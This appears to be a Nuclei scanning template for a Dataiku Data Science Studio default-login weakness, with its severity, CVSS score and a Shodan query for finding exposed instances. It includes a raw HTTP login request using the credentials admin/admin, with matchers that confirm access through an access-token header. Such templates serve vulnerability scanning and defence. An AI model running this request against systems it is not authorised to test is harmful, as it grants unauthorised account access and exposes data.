Dataiku contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. This vulnerability may also lead to server-side request forgery and/or remote code execution.
shodan: title:"dataiku"
PoC代码[已公开]
id: dataiku-default-login
info:
name: Dataiku - Default Login
author: random-robbie
severity: high
description: Dataiku contains a default login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations. This vulnerability may also lead to server-side request forgery and/or remote code execution.
reference:
- https://www.dataiku.com
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:dataiku:data_science_studio:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"dataiku"
product: data_science_studio
vendor: dataiku
tags: default-login,dataiku,vuln
http:
- raw:
- |
POST /dip/api/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=utf-8
login=admin&password=admin
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'dss_access_token'
- type: status
status:
- 200
# digest: 4a0a00473045022100c77d1acc6c0cbd5a887ebab4c4521eb6e202bb6f1412d6cfa49a1d8c4b8b2d62022041a78c75f1fa78cd24a6722fc3ac4d2c98f1754139afcfebbe75b1c94c8cc9f8:922c64590222798bb761d5b6d8e72950